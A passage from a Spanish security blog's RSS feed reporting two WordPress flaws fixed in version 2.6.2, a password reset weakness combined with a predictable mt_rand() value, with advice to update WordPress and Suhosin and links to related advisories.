href="http://www.dragonjar.org/tag/desarrollo" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Desarrollo">desarrollo</a> de WordPress, el primero fallo, permite manipular las cuentas de usuario, cambiando su contraseña por otra generada &#8220;aleatoriamente&#8221;, la nueva contraseña no es visible pero aquí es donde pone su grano de arena el otro <a
href="http://www.dragonjar.org/tag/bug" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bug">bug</a> descubierto en la funcion mt_rand() por Boren ya que gracias a este el atacante puede identificar la nueva contraseña generada de forma &#8220;aleatoria&#8221;.<span
id="more-1236"></span></p><p>Ryan nos recuerda que estos agujeros no afectan sólo a WordPress, sino a cualquier programa escrito en <a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">PHP</a>, por lo que es aconsejable que actualicen su versión de <a
href="http://www.suspekt.org/2008/08/22/suhosin-0926-improved-randomness/">Suhosin</a>.</p><p>Es mas que recomendable que actualices tu versión de <a
href="http://wordpress.org/download/">WordPress por la 2.6.2 haciendo una actualización completa</a> o <a
href="http://trac.wordpress.org/changeset?format=zip&amp;new=8872&amp;old=8872&amp;new_path=tags%2F2.6.2&amp;old_path=tags%2F2.6.1">descargando solo los archivos modificados de la 2.6.1 a la 2.6.2</a>.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a
href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a
href="http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml" title="Reseteo Remoto del Password de Admin en WordPress">Reseteo Remoto del Password de Admin en WordPress</a></li><li><a
href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a
href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a
href="http://www.dragonjar.org/actualiza-a-wordpress-265.xhtml" title="Actualiza a WordPress 2.6.5">Actualiza a WordPress 2.6.5</a></li><li><a
href="http://www.dragonjar.org/actualiza-a-wordpress-263.xhtml" title="Actualiza a WordPress 2.6.3">Actualiza a WordPress 2.6.3</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/2-problemas-graves-que-se-solucionan-en-wordpress-262.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 37/269 queries in 0.231 seconds using disk: basic
Object Caching 16906/17334 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 16:12:30 -->
